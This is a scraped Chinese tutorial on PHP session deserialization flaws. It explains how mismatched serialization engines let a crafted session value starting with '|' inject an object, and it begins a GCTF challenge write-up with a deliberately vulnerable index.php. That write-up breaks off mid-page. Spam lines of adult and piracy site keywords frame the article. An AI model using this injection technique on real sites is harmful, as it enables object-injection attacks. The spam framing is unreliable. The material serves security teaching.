久久久久久久av_日韩在线中文_看一级毛片视频_日本精品二区_成人深夜福利视频_武道仙尊动漫在线观看

深入淺析PHP的session反序列化漏洞問題

這篇文章主要介紹了PHP的session反序列化漏洞問題,需要的朋友可以參考下

在php.ini中存在三項配置項:

session.save_path=""  --設(shè)置session的存儲路徑
session.save_handler="" --設(shè)定用戶自定義存儲函數(shù),如果想使用PHP內(nèi)置會話存儲機制之外的可以使用本函數(shù)(數(shù)據(jù)庫等方式)
session.auto_start  boolen --指定會話模塊是否在請求開始時啟動一個會話,默認為0不啟動
session.serialize_handler  string --定義用來序列化/反序列化的處理器名字。默認使用php 

以上的選項就是與PHP中的Session存儲和序列話存儲有關(guān)的選項。

在使用xampp組件安裝中,上述的配置項的設(shè)置如下:

session.save_path="D:\xampp\tmp"  表明所有的session文件都是存儲在xampp/tmp下
session.save_handler=files     表明session是以文件的方式來進行存儲的
session.auto_start=0        表明默認不啟動session
session.serialize_handler=php    表明session的默認序列話引擎使用的是php序列話引擎

 在上述的配置中,session.serialize_handler是用來設(shè)置session的序列話引擎的,除了默認的PHP引擎之外,還存在其他引擎,不同的引擎所對應(yīng)的session的存儲方式不相同。

php_binary:存儲方式是,鍵名的長度對應(yīng)的ASCII字符+鍵名+經(jīng)過serialize()函數(shù)序列化處理的值

php:存儲方式是,鍵名+豎線+經(jīng)過serialize()函數(shù)序列處理的值

php_serialize(php>5.5.4):存儲方式是,經(jīng)過serialize()函數(shù)序列化處理的值 

在PHP中默認使用的是PHP引擎,如果要修改為其他的引擎,只需要添加代碼ini_set('session.serialize_handler', '需要設(shè)置的引擎');。示例代碼如下:

session 的目錄在 /var/lib/php/sessions 中

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['name'] = 'spoock';
var_dump($_SESSION);

在 php_serialize 引擎下,session文件中存儲的數(shù)據(jù)為:

a:1:{s:4:"name";s:6:"spoock";}

php 引擎下文件內(nèi)容為:

name|s:6:"spoock";

php_binary 引擎下文件內(nèi)容為:

names:6:"spoock";

由于name的長度是4,4在ASCII表中對應(yīng)的就是EOT。根據(jù)php_binary的存儲規(guī)則,最后就是names:6:"spoock";。(突然發(fā)現(xiàn)ASCII的值為4的字符無法在網(wǎng)頁上面顯示,這個大家自行去查ASCII表吧)

PHP Session中的序列化危害

PHP中的Session的實現(xiàn)是沒有的問題,危害主要是由于程序員的Session使用不當(dāng)而引起的。

如果在PHP在反序列化存儲的$_SESSION數(shù)據(jù)時使用的引擎和序列化使用的引擎不一樣,會導(dǎo)致數(shù)據(jù)無法正確第反序列化。通過精心構(gòu)造的數(shù)據(jù)包,就可以繞過程序的驗證或者是執(zhí)行一些系統(tǒng)的方法。例如:

$_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';

php文件如:

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';

訪問后得到session文件中的內(nèi)容如下:

root/var/lib/php/sessions cat sess_e07gghbkcm0etit02bkjlbhac6 
a:1:{s:4:"ryat";s:30:"|O:1:"A":1:{s:1:"a";s:2:"xx";} 

但此時模擬在其他頁面使用不同的php引擎來讀取時的內(nèi)容如下:(默認使用php引擎讀取session文件)

<?php
#ini_set('session.serialize_handler', 'php_serialize');
session_start();
#$_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';
class A {
  public $a = 'aa';
  function __wakeup() {
    echo $this->a;
  }
}
// var_dump($_SESSION);

訪問該頁面輸出xx

xxarray(1) {
 ["a:1:{s:4:"ryat";s:30:""]=>
 object(A)#1 (1) {
  ["a"]=>
  string(2) "xx"
 }
} 

這是因為當(dāng)使用php引擎的時候,php引擎會以|作為作為key和value的分隔符,那么就會將 a:1:{s:4:"ryat";s:30:" 作為SESSION的key,將 O:1:"A":1:{s:1:"a";s:2:"xx";} 作為value,然后進行反序列化,最后就會得到A這個類。

這種由于序列話化和反序列化所使用的不一樣的引擎就是造成PHP Session序列話漏洞的原因。漏洞在加載使用php引擎的頁面時session去讀session中的內(nèi)容并反序列化導(dǎo)致漏洞觸發(fā),不需要任何輸出

GCTF上的一道session反序列化漏洞分析:

index.php中內(nèi)容為:

<?php
//error_reporting(E_ERROR & ~E_NOTICE);
ini_set('session.serialize_handler', 'php_serialize');
header("content-type;text/html;charset=utf-8");
session_start();
if(isset($_GET['src'])){
  $_SESSION['src'] = $_GET['src'];
  highlight_file(__FILE__);
  print_r($_SESSION['src']);
}
?>
<!DOCTYPE HTML>
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>代碼審計2</title>
 </head>
 <body>
【網(wǎng)站聲明】本站除付費源碼經(jīng)過測試外,其他素材未做測試,不保證完整性,網(wǎng)站上部分源碼僅限學(xué)習(xí)交流,請勿用于商業(yè)用途。如損害你的權(quán)益請聯(lián)系客服QQ:2655101040 給予處理,謝謝支持。

相關(guān)文檔推薦

這篇文章主要介紹了PHP有序表查找之插值查找算法,簡單分析了插值查找算法的概念、原理并結(jié)合實例形式分析了php實現(xiàn)針對有序表插值查找的相關(guān)操作技巧,需要的朋友可以參考下
下面小編就為大家分享一篇ThinkPHP整合datatables實現(xiàn)服務(wù)端分頁的示例代碼,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧
下面小編就為大家分享一篇PHP實現(xiàn)APP微信支付的實例講解,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧
這篇文章主要介紹了PHP實現(xiàn)的多維數(shù)組排序算法,結(jié)合實例形式對比分析了php針對多維數(shù)組及帶有鍵名的多維數(shù)組進行排序相關(guān)操作技巧與注意事項,需要的朋友可以參考下
這篇文章主要為大家詳細介紹了php結(jié)合ajaxuploadfile實現(xiàn)無刷新文件上傳功能,具有一定的參考價值,感興趣的小伙伴們可以參考一下
本篇文章給大家詳細介紹了PHP開發(fā)接口使用RSA進行加密解密方法,對此有興趣的朋友可以學(xué)習(xí)下。
主站蜘蛛池模板: h视频网站在线观看 | 久久33 | 久久国产综合 | 欧美日韩美女 | 国产成人精品一区二三区在线观看 | 国产精品久久久久久久久久 | 国产精品99久久久久久www | 欧美视频一区二区三区 | 国产免费xxx | 成人免费黄色片 | 久久久久亚洲精品 | 第四色影音先锋 | 亚洲午夜精品一区二区三区他趣 | www..com18午夜观看 | a级在线观看 | 欧美一区二区三区在线观看 | 狠狠av | 免费看啪啪网站 | 一区二区av | 一区二区三区四区av | 日韩精品久久一区二区三区 | 中文字幕色站 | 色吊丝2288sds中文字幕 | 欧美久久视频 | 成人国产在线视频 | 欧美综合久久久 | 国产日屁 | 精品日韩一区二区 | 国产探花在线精品一区二区 | 日韩一级免费看 | 国产伊人精品 | 国产日韩一区二区 | 欧美激情五月 | 久精品久久 | 91国自产| 亚洲精品一区二区网址 | 中文字幕乱码一区二区三区 | 免费国产一区 | 欧美日韩国产一区二区三区 | 亚洲国内精品 | 在线欧美一区 |